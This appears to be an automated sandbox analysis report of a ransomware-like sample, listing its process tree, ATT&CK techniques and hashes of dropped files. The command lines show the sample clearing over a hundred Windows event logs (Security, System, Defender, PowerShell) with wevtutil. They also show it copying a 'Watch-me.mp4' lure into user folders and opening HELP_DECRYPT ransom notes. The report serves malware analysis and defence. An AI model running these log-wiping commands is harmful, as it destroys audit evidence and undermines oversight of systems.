wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
3⤵
PID:2008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
3⤵
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
3⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
3⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
3⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
3⤵
PID:1832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
3⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
3⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
3⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
3⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
3⤵
PID:1680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
3⤵
PID:1492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
3⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
3⤵
PID:704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
3⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
3⤵
PID:2008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
3⤵
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
3⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
3⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
3⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
3⤵
PID:1832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
3⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
3⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
3⤵
PID:740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
3⤵
PID:824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
3⤵
PID:744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
3⤵
PID:1932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
3⤵
PID:1808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
3⤵
PID:1828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
3⤵
PID:2004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
3⤵
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
3⤵
PID:1344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
3⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
3⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
3⤵
PID:1680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Debug"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
3⤵
PID:824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
3⤵
PID:744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
3⤵
PID:1932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
3⤵
PID:1808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
3⤵
PID:1828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
3⤵
PID:2004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
3⤵
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
3⤵
PID:1344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
3⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
3⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
3⤵
PID:1680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
3⤵
PID:824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
3⤵
PID:744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
3⤵
PID:1932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
3⤵
PID:1808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
3⤵
PID:1828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
3⤵
PID:2004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
3⤵
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
3⤵
PID:1344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ntshrui"
3⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
3⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "OAlerts"
3⤵
PID:1680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Security"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Setup"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "System"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "TabletPC_InputPanel_Channel"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
3⤵
PID:824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSetup"
3⤵
PID:744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSyncEngine"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Windows PowerShell"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "muxencode"
3⤵
PID:1932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl
3⤵
PID:1808

C:\Windows\system32\cmd.exe
cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Watch-me.mp4"
2⤵
PID:1828

C:\Windows\system32\cmd.exe
cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Admin\Desktop\Watch-me.mp4"
2⤵
PID:1784

C:\Windows\system32\cmd.exe
cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Default\Desktop\Watch-me.mp4"
2⤵
PID:1988

C:\Windows\system32\cmd.exe
cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Public\Desktop\Watch-me.mp4"
2⤵
PID:1220

C:\Windows\system32\cmd.exe
cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Admin/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\""
2⤵
PID:948

C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Admin/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1856

C:\Windows\system32\cmd.exe
cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\""
2⤵
PID:1592

C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1028

C:\Windows\system32\cmd.exe
cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Public/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\""
2⤵
PID:1488

C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
C:\windows\syswow64\windowspowershell\v1.0\powershell copy C:\Users\Public\Music\video.mp4 \"C:\Users\Public/AppData/Roaming/Microsoft/Windows/Network Shortcuts/Watch-me.mp4\"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1852

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\HELP_DECRYPT_YOUR_FILES.txt
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1900

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.html
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1356

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1356 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:676

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2e191488-b019-4f69-8048-26ac3d47ea7e
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4af5245f-d959-43b7-adbe-5e3a99560601
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6b6af20d-c75d-4b78-9424-fc4143888302
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_71f48fcb-d5a3-4de7-880c-f85c8d73bd69
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_83604d7d-c08b-4027-8653-637076f1f19a
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac066947-ee24-412d-b9fc-33b0e0bd0bfe
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cf3810c4-fe74-4404-ac0f-be95d5ae83d4
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e2204ef2-d7f5-44ec-ab39-14d9dd729685
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
8320f31e44970807c3f09b1673619a04

SHA1
cf59da989a8f5f98d4a41e16384f43d22e6e0b4c

SHA256
4d6a34a2260cc3af364dd1847cd7a506ac858a8467889b9a6e791834beda46fc

SHA512
